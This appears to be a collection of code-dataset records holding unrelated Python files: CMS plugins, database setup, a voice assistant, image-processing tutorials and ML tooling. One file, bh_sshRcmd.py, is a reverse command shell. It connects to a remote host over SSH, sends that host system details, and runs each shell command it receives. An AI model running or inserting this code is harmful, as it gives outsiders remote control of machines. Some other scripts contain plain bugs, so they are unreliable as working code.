'CATEGORICAL', 'STR': 708, 'END': 709,\n 'OTHERS': {-9: 'MISSING', -7: 'NOT_INTERV', -6: 'MUL_RESP',\n -3: 'SKIP_ANS'},\n 'VALS': {-9: 'MISSING', -6: 'MUL_RESP', -1: 'DONT_K', -3: 'SKIP_ANS',\n -7: 'NOT_INTERV',\n 1: 'NEVER', 2: 'RARELY', 3: 'SOMET', 4: 'OFTEN'}}","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":17072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102809438","text":"from cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\nfrom cms.models.pluginmodel import CMSPlugin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .models import Category, Project\n\n\nclass CategoriesPlugin(CMSPluginBase):\n model = CMSPlugin\n render_template = \"projects/plugins/categories.html\"\n cache = False\n name = _(\"Categories Plugin\")\n\n def render(self, context, instance, placeholder):\n context = super(CategoriesPlugin, self).render(context, instance, placeholder)\n context.update({\n 'categories': Category.objects.all()\n })\n return context\n\nplugin_pool.register_plugin(CategoriesPlugin)\n\n\nclass ProjectPlugin(CMSPluginBase):\n model = CMSPlugin\n render_template = \"projects/plugins/lopende-projecten.html\"\n cache = False\n name = _(\"Current Projects Plugin\")\n\n def render(self, context, instance, placeholder):\n context = super(ProjectPlugin, self).render(context, instance, placeholder)\n context.update({\n 'projects': Project.objects.filter(featured=True)\n })\n return context\n\nplugin_pool.register_plugin(ProjectPlugin)","sub_path":"projects/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"225192577","text":"import configparser\nimport sys\nimport psycopg2\nimport sql_queries\n\ndef connect_db():\n \"\"\"\n Connects to DB (AWS Redshift)\n \n :return: DB Connection\n \"\"\"\n config = configparser.ConfigParser()\n config.read_file(open('config/dwh.cfg'))\n con = psycopg2.connect(\n \"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values())\n )\n cur = con.cursor()\n \n con.close()\n \n return cur, con\n \n\ndef drop_tables(con, cur):\n \"\"\"\n Drop tables in DB\n \n :param con: DB Connection\n :param cur: DB Cursor\n \"\"\"\n try:\n for query in sql_queries.drop_tables:\n cur.execute(query)\n con.commit()\n except TypeError as e:\n print(\"TypeError {}\".format(e))\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n\n\ndef create_tables(con, cur):\n \"\"\"\n Create tables in DB if it doesns't exist\n \n :param con: DB Connection\n :param cur: DB Cursor\n \"\"\"\n try:\n for query in sql_queries.create_tables:\n cur.execute(query)\n con.commit()\n except TypeError as e:\n print(\"TypeError {}\".format(e))\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n raise\n \n \ndef main():\n \"\"\"\n Main executor\n - Connect to DB\n - [Redshift] drop existing tables\n - [Redshift] create tables if it doesn't exist\n \"\"\"\n cur, con = connect_db() \n \n drop_tables(con, cur)\n create_tables(con, cur)\n \n con.close()\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"project5_capstone/create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"573431757","text":"import wx\nimport wolframalpha\nimport wikipedia\nimport speech_recognition as sr\n# I chose not to enable eSpeak\n\nclass MyFrame(wx.Frame):\n def __init__(self):\n wx.Frame.__init__(self, None,\n pos=wx.DefaultPosition, size=wx.Size(450, 100),\n style=wx.MINIMIZE_BOX | wx.SYSTEM_MENU | wx.CAPTION |\n wx.CLOSE_BOX | wx.CLIP_CHILDREN,\n title=\"Pythonify\")\n panel = wx.Panel(self)\n my_sizer = wx.BoxSizer(wx.VERTICAL)\n lbl = wx.StaticText(panel,\n label=\"Hello I am the Python Digital Assistant. How can I help you?\")\n my_sizer.Add(lbl, 0, wx.ALL, 5)\n self.txt = wx.TextCtrl(panel, style=wx.TE_PROCESS_ENTER,size=(400,30))\n self.txt.SetFocus()\n self.txt.Bind(wx.EVT_TEXT_ENTER, self.OnEnter)\n my_sizer.Add(self.txt, 0, wx.ALL, 5)\n panel.SetSizer(my_sizer)\n self.Show()\n\n def OnEnter(self, event):\n user_input = self.txt.GetValue()\n user_input = user_input.lower()\n\n # Voice recognition input\n if user_input == '':\n r = sr.Recognizer()\n with sr.Microphone() as source:\n audio = r.listen(source)\n try:\n # Modified so the passed data isn't unicode and the variable stores the value for later\n self.txt.SetValue(str(r.recognize_google(audio)))\n user_input = str(r.recognize_google(audio))\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand.\\nPlease try again.\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition Service; {0}\".format(e))\n \n # Try to catch any disambugation and other exceptions\n try:\n # Wolfram\n app_id = \"YOUR-WOLFRAM-ID\"\n client = wolframalpha.Client(app_id)\n res = client.query(user_input)\n answer = next(res.results).text\n print(answer)\n except:\n # Wikipedia\n \"\"\" First, cleanse the string\n of 'who', 'what', 'where'\n queries to obtain info \"\"\"\n\n query_options = [\"who is\", \"what is\", \"where is\", \"what does\", \"how does\", \"who does\"]\n split_input = user_input.split(\" \")\n # Then it checks if the input string contains any of the query modifiers\n for option in query_options:\n if user_input.__contains__(option):\n for i in range(2): # Removes the very first thing in the list twice\n split_input.remove(split_input[0])\n # Rejoin the split input \n user_input = \" \".join(split_input)\n try:\n # Some common language shorthand codes just in case\n # en - English\n # de - German\n # zh - Chinese\n # es - Spanish\n # fr - French\n # ru - Russian\n wikipedia.set_lang(\"en\")\n # I personally like how short yet detailed 3 sentences can be\n result = wikipedia.summary(user_input, sentences=3)\n print(\"\\n\" + result + \"\\n\")\n # If the search passed Wolfram yet still finds an issue with disambiguation\n # then it iterates through the items neatly and restarts the search\n except wikipedia.exceptions.DisambiguationError as e:\n print(\"That didn't work. Try being more specific:\\n\")\n for item in e.options:\n print(item)\n\nif __name__ == \"__main__\":\n app = wx.App(True)\n frame = MyFrame()\n app.MainLoop()\n","sub_path":"PyDa-Complete.py","file_name":"PyDa-Complete.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"230698153","text":"import requests\nimport json\nimport os\nimport time,glob,uuid\n\n\ninput_dir = \"/home/srihari/anuvaad-toolkit/block_merger_latest/anuvaad/anuvaad-etl/anuvaad-extractor/document-processor/ocr/tesseract_ulca_v2/doc/bounding_box/hindi/*.jpg\"\nsave_path = \"report/\"\nlang = \"hi\"\n\nservice_url = \"http://0.0.0.0:5000/anuvaad/ocr/v0/ulca-ocr\"\n\n\ndef get_requeset(input_dir):\n req = {\n \"config\": {\n \"language\": {\n \"sourceLanguage\": lang\n }\n \n },\n \"image\":[]\n}\n images = glob.glob(input_dir)\n\n for image in images:\n # image_name = image.split(\"/\")[-1]\n print(image)\n req[\"image\"].append({\"local_path\": image})\n return req\n\n\nif __name__ == \"__main__\":\n print(\"ulca ocr service started\")\n start_time = time.time()\n\n req = get_requeset(input_dir)\n print(req)\n res = requests.post(service_url, json=req, timeout=None)\n data = res.json()\n file_id = save_path+str(uuid.uuid4())+\".json\"\n with open(file_id, \"w\") as outfile:\n json.dump(data,outfile,ensure_ascii=True)\n \n","sub_path":"anuvaad-etl/anuvaad-extractor/document-processor/ocr/tesseract_ulca_v2/doc/test_batch.py","file_name":"test_batch.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"1558427","text":"#!/usr/bin/env python\n\"\"\"Scrapes a page to collect contents of comment divs\"\"\"\nfrom bs4 import BeautifulSoup\nimport urllib2, arrow\n\ncomments = []\nurl = raw_input(\"URL: \")\n\npages = urllib2.urlopen(url)\nsoup = BeautifulSoup(page, 'html.parser')\n\ncomment_box = soup.find('div', attrs={'class': 'comment'})\n\ncomment = comment_box.text.strip()\n\ncomments.append(comment)\n\n\n#tree = html.fromstring(pagescrape.content)\n#for elem in tree.xpath(\"//div[@class='comment '] | //div[@class='comment reply']\"):\n# print etree.tostring(elem)\n","sub_path":"commentscraper.py","file_name":"commentscraper.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"236601957","text":"import tube\ntube.readCalibrationFile('CalibTable','/SNS/users/rwp/corelli/tube_calibration2/CalibTable2_combined.txt')\n\nfor run in range(81285,81405+1):\n Load(Filename='CORELLI_{}'.format(run),\n OutputWorkspace='run',\n FilterByTofMin=1000,\n FilterByTofMax=16666)\n SetGoniometer(Workspace='run',\n Axis0='BL9:Mot:Sample:Axis3,0,1,0,1')\n ApplyCalibration('run','CalibTable')\n ConvertToMD(InputWorkspace='run',\n OutputWorkspace='output',\n QDimensions='Q3D',\n dEAnalysisMode='Elastic',\n Q3DFrames='Q_sample',\n MinValues=[-15,-5,-15],\n MaxValues=[15,5,15],\n OverwriteExisting=False)\n\nFindPeaksMD(InputWorkspace='output', PeakDistanceThreshold=0.5, MaxPeaks=2000, OutputWorkspace='peaks')\nFindUBUsingFFT(PeaksWorkspace='peaks', MinD=5, MaxD=20)\nShowPossibleCells(PeaksWorkspace='peaks')\nSelectCellWithForm(PeaksWorkspace='peaks', FormNumber=26, Apply=True)\nIndexPeaks(PeaksWorkspace='peaks')\n\n\nSaveIsawPeaks('peaks', Filename='/SNS/users/rwp/corelli/cal_2018_10_Natrolite/peaks_tubeCal.peaks')\n","sub_path":"cal_2018_10_Natrolite/try_some_data_with_tube_cal.py","file_name":"try_some_data_with_tube_cal.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"85295534","text":"#io_module.py\n# -*- coding: utf-8 -*-\n\n# $Rev: 42 $: \n# $Author: ewald $: \n# $Date: 2013-03-03 11:30:40 +0100 (So, 03. Mär 2013) $:\n# $Id: io_module.py 42 2013-03-03 10:30:40Z ewald $ \n\n__version__ = \"$Revision: 42 $\"\n\nimport io\nimport os\nfrom messaging import stdMsg, dbgMsg, warnMsg, errMsg, setDebugging\nimport sys\nimport re\n\ndef isWritable(directory):\n try:\n tmp_prefix = \"tmp_file_for_write_testing\";\n count = 0\n filename = os.path.join(directory, tmp_prefix)\n while(os.path.exists(filename)):\n filename = \"{}.{}\".format(os.path.join(directory, tmp_prefix),count)\n count = count + 1\n f = open(filename,\"w\")\n f.close()\n os.remove(filename)\n return True\n except Exception as e:\n dbgMsg(\"specified working directory \\'%s\\' is not writable!\\n\" % directory)\n return False\n\n\ndef check_working_directory (directory):\n dbgMsg(\"checking working directory %s\" % directory)\n if not os.path.exists(directory):\n errMsg(\"specified working directory \\'%s\\' does not exist!\\n\" % directory)\n sys.exit(1)\n if not os.path.isdir(directory):\n errMsg(\"specified working directory \\'%s\\' is not a directory!\\n\" % directory)\n sys.exit(1)\n if not isWritable(directory):\n errMsg(\"specified working directory \\'%s\\' is not writable!\\n\" % directory)\n sys.exit()\n return True\n \ndef check_database_file (directory, file_name): \n fn = directory+r'/'+ file_name\n if not os.path.isfile(fn):\n errMsg(\"Specified data base file \\'%s\\' does not exist!\\n\\n\" % fn)\n sys.exit(1)\n if not os.access(fn, os.R_OK):\n errMsg(\"Specified data base file \\'%s\\' is not readable!\\n\\n\" % fn)\n sys.exit(1)\n if os.stat(fn).st_size==0:\n errMsg(\"Specified data base file \\'%s\\' has size of 0!\\n\\n\" % fn)\n sys.exit(1)\n return True\n \ndef check_float(string):\n floatpattern=r'^[+-]?(\\d+(\\.\\d*)?|\\.\\d+)([eE][+-]?\\d+)?$'\n m=re.match(floatpattern, string)\n if m is not None:\n return True\n else:\n return False\n \ndef input_float(string):\n done=False\n while not done:\n input=raw_input(string)\n done=check_float(input)\n fp=float(input)\n return fp\n","sub_path":"io_module.py","file_name":"io_module.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167830679","text":"\"\"\"\r\nTutorial vidoe 17: Morphological Transformation\r\n\r\nMorphological transformations are some simple operations based on the image shape. Normally performed on binary images.\r\nTwo things required the image and structuring element called kernel which decides nature of operation\r\nA kernel tells you how to change the value of any given pixel by combining it with different amounts of neighbouring pixels.\r\n\r\nUsed to remove noise, isolation of individual elements, finding intensity bumps or holes in image\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np \r\nfrom matplotlib import pyplot as plt \r\n\"\"\"\r\nimg=cv2.imread('smarties.png',cv2.IMREAD_GRAYSCALE)# simple zero would had done\r\n# we need a mask for the transformation which we get from simple thresholding\r\n\"\"\"\r\nimg=cv2.imread('LinuxLogo.jpg',0)\r\n_, mask=cv2.threshold(img,220,255,cv2.THRESH_BINARY_INV)\r\n# some black dots are there on balls( white area) because of reflection on balls\r\n\r\nkernel=np.ones((4,4),np.uint8)# here the kernel structure is 2x2 square\r\n\r\ndilation=cv2.dilate(mask,kernel,iterations=2)# morphological transformation\r\n#maximal pixel value overlapped by kernel and replace image pixel in anchor point position with mthat maximal value\r\n#removes/reduce uncertainities which are less than the kernel size based on neighbouring pixels\r\n# more the iterations more times it will be dilated\r\n# if kernel size is increased then the larger uncertainities will also merge like the shadow in image will merge with the ball if kernel=(5,5)\r\n# due to this dilation brighter portion is increased\r\n\r\nerosion=cv2.erode(mask,kernel,iterations=2)#morphological transform\r\n#Like soil erosion it erodes away the boundary of foreground object.The kernel defined slides through the image \r\n# and a pixel will be considered 1 if all are 1 in the kernel else 0\r\n#here it operates on minimal pixel value\r\n# it makes object in white smaller\r\n\r\nopening=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernel)\r\n# it is erosion followed by dilation\r\n\r\nclosing=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel)\r\n#dilation followed by erosion\r\n\r\nmg=cv2.morphologyEx(mask,cv2.MORPH_GRADIENT,kernel)\r\n# gradient it gets the boundary of objects. difference between dilation and erosion\r\nth=cv2.morphologyEx(mask,cv2.MORPH_TOPHAT,kernel)\r\n#top hat . difference between image and opening of image\r\nbh=cv2.morphologyEx(mask,cv2.MORPH_BLACKHAT,kernel)\r\n#black hat\r\ntitles=['Image','mask','Dilation','Erosion','Opening','Closing','Gradient','Top hat','Black hat']\r\nimages=[img, mask,dilation,erosion,opening,closing,mg,th,bh]\r\n \r\nfor i in range(9):\r\n plt.subplot(3,3,i+1),plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([]),plt.yticks([])\r\n\r\nplt.show()","sub_path":"opencv_tutorial/Tut10_MorphTransform.py","file_name":"Tut10_MorphTransform.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"371106274","text":"import threading\nimport paramiko\nimport subprocess\nimport sys\ndef ssh_command(ip, port, user, command):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n client.connect(ip, username=user, port=port)\n ssh_session = client.get_transport().open_session()\n if ssh_session.active:\n ssh_session.send(subprocess.check_output(\"system_profiler SPHardwareDataType\", shell=True))\n while True:\n command = ssh_session.recv(1024).decode()\n try:\n cmd_output = subprocess.check_output(command, shell=True)\n ssh_session.send(cmd_output)\n except Exception as e:\n ssh_session.send(str(e))\n client.close()\nssh_command(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])","sub_path":"bh_sshRcmd.py","file_name":"bh_sshRcmd.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"208959090","text":"\"\"\"\n Copyright (c) 2020 Intel Corporation\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport json\nimport os\n\nfrom ote import MMACTION_TOOLS\nfrom ote.utils.misc import run_through_shell\n\nfrom .base import BaseEvaluator\nfrom ..registry import EVALUATORS\n\n\n@EVALUATORS.register_module()\nclass MMActionEvaluator(BaseEvaluator):\n\n def _get_tools_dir(self):\n return MMACTION_TOOLS\n\n def _get_metric_functions(self):\n from ote.metrics.classification.common import mean_accuracy_eval\n\n return [mean_accuracy_eval]\n\n def _get_image_shape(self, cfg):\n image_size = cfg.input_img_size if isinstance(cfg.input_img_size, (tuple, list)) else [cfg.input_img_size] * 2\n assert len(image_size) == 2\n\n image_shape = [cfg.input_clip_length, image_size[0], image_size[1]]\n image_shape = ' '.join([str(x) for x in image_shape])\n\n return image_shape\n\n def _get_complexity_and_size(self, cfg, config_path, work_dir, update_config):\n image_shape = self._get_image_shape(cfg)\n tools_dir = self._get_tools_dir()\n\n res_complexity = os.path.join(work_dir, 'complexity.json')\n update_config = ' '.join([f'{k}={v}' for k, v in update_config.items()])\n update_config = f' --update_config {update_config}' if update_config else ''\n update_config = update_config.replace('\"', '\\\\\"')\n run_through_shell(\n f'python3 {tools_dir}/get_flops.py'\n f' {config_path}'\n f' --shape {image_shape}'\n f' --out {res_complexity}'\n f'{update_config}')\n\n with open(res_complexity) as read_file:\n content = json.load(read_file)\n\n return content\n","sub_path":"ote/ote/modules/evaluators/mmaction.py","file_name":"mmaction.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349416586","text":"import dash\nfrom dash import html, dcc, Input, Output, State, callback\nimport dash_bootstrap_components as dbc\n\ndash.register_page(__name__, path='/docSpectInstructions2')\n\ntable_header = [\n html.Thead(html.Tr([html.Th(\"Company Name\"), html.Th(\"T for C\"), html.Th(\"T for C confidence\"), html.Th(\"Value ($)\"), html.Th(\"Impact\"),html.Th(\"Reviewed\")\n ]))\n]\nrow1 = html.Tr([html.Td(\"Company A\"), html.Td(\"Yes\"), html.Td(\"1.0\"),html.Td(\"900,000\"),html.Td(\"27,000\"),html.Td(\"Yes\")],style={'color':'green'})\nrow2 = html.Tr([html.Td(\"Company B\"), html.Td(\"No\"), html.Td(\"1.0\"),html.Td(\"90,000\"),html.Td(\"25,200\"),html.Td(\"Yes\")],style={'color':'red'})\nrow3 = html.Tr([html.Td(\"Company C\"), html.Td(\"Yes\"), html.Td(\"0.85\"),html.Td(\"150,000\"),html.Td(\"22,500\"),html.Td(\"No\")])\nrow4 = html.Tr([html.Td(\"Company D\"), html.Td(\"Yes\"), html.Td(\"0.95\"),html.Td(\"60,000\"),html.Td(\"3000\"),html.Td(\"No\")])\n\ntable_body = [html.Tbody([row1, row2, row3, row4])]\n\nlayout = html.Div(children=[\n html.H1(children='Training Part 2 : Estimating Contracts Total Value'),\n\n html.Div(children='''\n Let's say that after reviewing Contract A and B, you find that:\n '''),\n html.Div(children=\"The algorithm was correct for Company A, the clause it identified was a T for C clause.\", id=\"correctContract\",style={\"color\":\"green\"}),\n html.Div(children=\"The algorithm was wrong for Company B, the clause it identified was NOT a T for C clause.\",id=\"incorrectContract\",style={\"color\":\"red\"}),\n html.Br(),\n html.Div(children='''\n After you fixed the algorithm's mistake, this is what the updated table looks like.'''),\n html.Br(),\n dbc.Table(table_header + table_body, bordered=True, style={\"width\": \"50%\", \"text-align\": \"right\"}),\n html.Br(),\n html.Header(\"INSERT BOX PLOT AND INSIGHTS HERE\"),\n html.Div(children='''\n What would you estimate the total value across contracts with T for C clauses? To help you out, we provided some graphs and insights.'''),\n html.Br(),\n dcc.Input(\n id=\"estimateInput\",\n type=\"number\",\n placeholder=\"enter your estimate\",\n ),\n #insert graphs here\n# html.Div(children='''\n# But wait, what about company C and D? Even though you have not reviewed them, we know how likely it is for the algorithm to be correct based on its confidence. Using this information, we can estimate a range for the total potential revenue loss across all four contracts.\n# '''),\n# html.Br(),\n html.A(dbc.Button(\"Submit\"), href='/docSpectInstructions3'),\n\n],style={'margin-left':'150px','margin-right':'150px','margin-top':'50px'})\n\n# @callback(\n# [Output(\"correctContract\", \"children\"),Output(\"incorrectContract\",\"children\")],\n# Input(\"choiceChecklist\", \"value\"),\n# )\n# def checklistValidation(checklistSelected):\n# print(checklistSelected)\n# correctText= \"The clause identified by the T for C algorithm in Contract \" + checklistSelected[0] + \" is a T for C\"\n# incorrectText= \"The clause identified by the T for C algorithm in Contract \" + checklistSelected[1] + \" is a T for C\"\n# return correctText,incorrectText\n#\n","sub_path":"DocSpect-main/dash_pdf_components/pagesTestOld/docSpectInstructions2.py","file_name":"docSpectInstructions2.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73596066","text":"#!/usr/bin/env python3\n# coding: utf8\n\nimport pyxhook\nimport time\nimport autopy\n\nk = list()\ncorrespondance = {\"cdt\":\"Cordialement\",\"bye\":\"aurevoir\",\"slt\":\"Salut\",\"res\":\"Veuillez agréer mes profonds respects\"}\n\ndef kbevent(event):\n global running\n k.append(event.Key)\n\n # On transforme\n if event.Ascii == 192: #if F3 pressed\n chaine = \"\"\n v = k[-4:]\n les_trois_derniers = v[:3]\n for e in les_trois_derniers:\n chaine += e\n\n if chaine in correspondance:\n autopy.key.type_string(correspondance[chaine])\n\n# Create hookmanager\nhookman = pyxhook.HookManager()\n# Define our callback to fire when a key is pressed down\nhookman.KeyDown = kbevent\n# Hook the keyboard\nhookman.HookKeyboard()\n# Start our listener\nhookman.start()\n\n# Create a loop to keep the application running\nrunning = True\nwhile running:\n time.sleep(0.1)\n\n# Close the listener when we are done\nhookman.cancel()\n","sub_path":"autowrite.py","file_name":"autowrite.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"499093364","text":"# ------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.\n# ------------------------------------------------------------------------------------------\nimport logging\nimport os\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Any, List, Optional, Union\n\nimport torch\nfrom torch.optim.optimizer import Optimizer\nfrom torch.optim.rmsprop import RMSprop\n\nfrom InnerEye.Azure.azure_util import RUN_CONTEXT\nfrom InnerEye.ML.common import ModelExecutionMode\nfrom InnerEye.ML.config import ModelArchitectureConfig, PaddingMode, SegmentationModelBase, \\\n basic_size_shrinkage\nfrom InnerEye.ML.deep_learning_config import OptimizerType\nfrom InnerEye.ML.model_config_base import ModelConfigBase\nfrom InnerEye.ML.model_training_steps import get_scalar_model_inputs_and_labels\nfrom InnerEye.ML.models.architectures.base_model import BaseModel, CropSizeConstraints\nfrom InnerEye.ML.models.architectures.complex import ComplexModel\nfrom InnerEye.ML.models.architectures.unet_2d import UNet2D\nfrom InnerEye.ML.models.architectures.unet_3d import UNet3D\nfrom InnerEye.ML.models.layers.basic import BasicLayer\nfrom InnerEye.ML.models.parallel.data_parallel import DataParallelModel\nfrom InnerEye.ML.scalar_config import ScalarModelBase\nfrom InnerEye.ML.sequence_config import SequenceModelBase\nfrom InnerEye.ML.utils.device_aware_module import DeviceAwareModule\nfrom InnerEye.ML.utils.metrics_constants import LoggingColumns\nfrom InnerEye.ML.utils.ml_util import RandomStateSnapshot, is_gpu_available\nfrom InnerEye.ML.utils.temperature_scaling import ModelWithTemperature\nfrom InnerEye.ML.visualizers.model_summary import ModelSummary\n\nBaseModelOrDataParallelModel = Union[DeviceAwareModule, DataParallelModel]\n\n\n@dataclass\nclass ModelAndInfo:\n \"\"\"\n A holder for a model and, optionally, associated information.\n model: any model\n optimizer: associated optimizer if any\n is_mean_teacher: whether this is (intended to be) a mean teacher model\n is_adjusted: whether model adjustments (which cannot be done twice) have been applied\n checkpoint_epoch: the training epoch this model was created, if loaded from disk\n model_execution_mode: mode this model will be run in\n \"\"\"\n model: BaseModelOrDataParallelModel\n optimizer: Optional[Optimizer] = None\n is_mean_teacher: bool = False\n is_adjusted: bool = False\n checkpoint_epoch: Optional[int] = None\n model_execution_mode: ModelExecutionMode = ModelExecutionMode.TEST\n\n def to_cuda(self) -> None:\n assert self.model is not None\n self.model = self.model.cuda()\n\n def set_data_parallel(self, device_ids: Optional[List[Any]]) -> None:\n assert self.model is not None\n self.model = DataParallelModel(self.model, device_ids=device_ids)\n\n\ndef init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n \"\"\"\n Initialize the weights of a Pytorch module.\n\n :param m: A PyTorch module. Only Conv3d and BatchNorm3d are initialized.\n \"\"\"\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n\n\n# noinspection PyTypeChecker\ndef build_net(args: SegmentationModelBase) -> BaseModel:\n \"\"\"\n Build network architectures\n\n :param args: Network configuration arguments\n \"\"\"\n full_channels_list = [args.number_of_image_channels, *args.feature_channels, args.number_of_classes]\n initial_fcn = [BasicLayer] * 2\n residual_blocks = [[BasicLayer, BasicLayer]] * 3\n basic_network_definition = initial_fcn + residual_blocks # type: ignore\n # no dilation for the initial FCN and then a constant 1 neighbourhood dilation for the rest residual blocks\n basic_dilations = [1] * len(initial_fcn) + [2, 2] * len(basic_network_definition)\n # Crop size must be at least 29 because all architectures (apart from UNets) shrink the input image by 28\n crop_size_constraints = CropSizeConstraints(minimum_size=basic_size_shrinkage + 1)\n run_weight_initialization = True\n\n network: BaseModel\n if args.architecture == ModelArchitectureConfig.Basic:\n network_definition = basic_network_definition\n network = ComplexModel(args, full_channels_list,\n basic_dilations, network_definition, crop_size_constraints) # type: ignore\n\n elif args.architecture == ModelArchitectureConfig.UNet3D:\n network = UNet3D(input_image_channels=args.number_of_image_channels,\n initial_feature_channels=args.feature_channels[0],\n num_classes=args.number_of_classes,\n kernel_size=args.kernel_size)\n run_weight_initialization = False\n\n elif args.architecture == ModelArchitectureConfig.UNet2D:\n network = UNet2D(input_image_channels=args.number_of_image_channels,\n initial_feature_channels=args.feature_channels[0],\n num_classes=args.number_of_classes,\n padding_mode=PaddingMode.Edge)\n run_weight_initialization = False\n\n else:\n raise ValueError(\"Unknown model architecture {}\".format(args.architecture))\n network.validate_crop_size(args.crop_size, \"Training crop size\")\n network.validate_crop_size(args.test_crop_size, \"Test crop size\") # type: ignore\n # Initialize network weights\n if run_weight_initialization:\n network.apply(init_weights) # type: ignore\n return network\n\n\ndef update_model_for_multiple_gpus(model_and_info: ModelAndInfo,\n args: ModelConfigBase,\n execution_mode: ModelExecutionMode = ModelExecutionMode.TRAIN) -> \\\n ModelAndInfo:\n \"\"\"\n Updates a given torch model as such input mini-batches are parallelized across the batch dimension to utilise\n multiple gpus. If model parallel is set to True and execution is in test mode, then model is partitioned to\n perform full volume inference.\n :param model_and_info: The torch module object representing the network and the optimizer.\n :param args: The arguments object with attributes used to enable amp training and create the parallel model.\n :param execution_mode: mode, i.e. train or test\n :return: Updated torch model and optimizer.\n \"\"\"\n if model_and_info.is_adjusted:\n logging.debug(\"model_and_info.is_adjusted is already True\")\n return model_and_info\n if args.use_gpu:\n # In the normal training codepath, the model should already be on the GPU, but in some tests not.\n model_and_info.to_cuda()\n logging.info(\"Adjusting the model to use mixed precision training.\")\n # If model parallel is set to True, then partition the network across all available gpus.\n if args.use_model_parallel:\n devices = args.get_cuda_devices()\n assert devices is not None # for mypy\n model_and_info.model.partition_model(devices=devices) # type: ignore\n else:\n logging.info(\"Making no adjustments to the model because no GPU was found.\")\n\n # Update model related config attributes (After Model Parallel Activated)\n args.adjust_after_mixed_precision_and_parallel(model_and_info.model)\n\n # DataParallel enables running the model with multiple gpus by splitting samples across GPUs\n # If the model is used in training mode, data parallel is activated by default.\n # Similarly, if model parallel is not activated, data parallel is used as a backup option\n use_data_parallel = (execution_mode == ModelExecutionMode.TRAIN) or (not args.use_model_parallel)\n if args.use_gpu and use_data_parallel:\n logging.info(\"Adjusting the model to use DataParallel\")\n # Move all layers to the default GPU before activating data parallel.\n # This needs to happen even though we put the model to the GPU at the beginning of the method,\n # but we may have spread it across multiple GPUs later.\n model_and_info.to_cuda()\n model_and_info.set_data_parallel(device_ids=args.get_cuda_devices())\n\n model_and_info.is_adjusted = True\n logging.debug(\"model_and_info.is_adjusted set to True\")\n return model_and_info\n\n\ndef create_optimizer(args: ModelConfigBase, model: torch.nn.Module) -> Optimizer:\n \"\"\"\n Creates a torch optimizer for the given model.\n\n :param args: The arguments object with attributes used to create the optimizer_type.\n :param model: The DataParallel object representing the network.\n :return: An instance of torch.optim.Optimizer\n \"\"\"\n # Select optimizer type\n if args.optimizer_type in [OptimizerType.Adam, OptimizerType.AMSGrad]:\n return torch.optim.Adam(model.parameters(), args.l_rate, args.adam_betas, args.opt_eps, args.weight_decay,\n amsgrad=args.optimizer_type == OptimizerType.AMSGrad)\n elif args.optimizer_type == OptimizerType.SGD:\n return torch.optim.SGD(model.parameters(), args.l_rate, args.momentum,\n weight_decay=args.weight_decay)\n elif args.optimizer_type == OptimizerType.RMSprop:\n return RMSprop(model.parameters(), args.l_rate, args.rms_alpha, args.opt_eps,\n args.weight_decay, args.momentum)\n else:\n raise 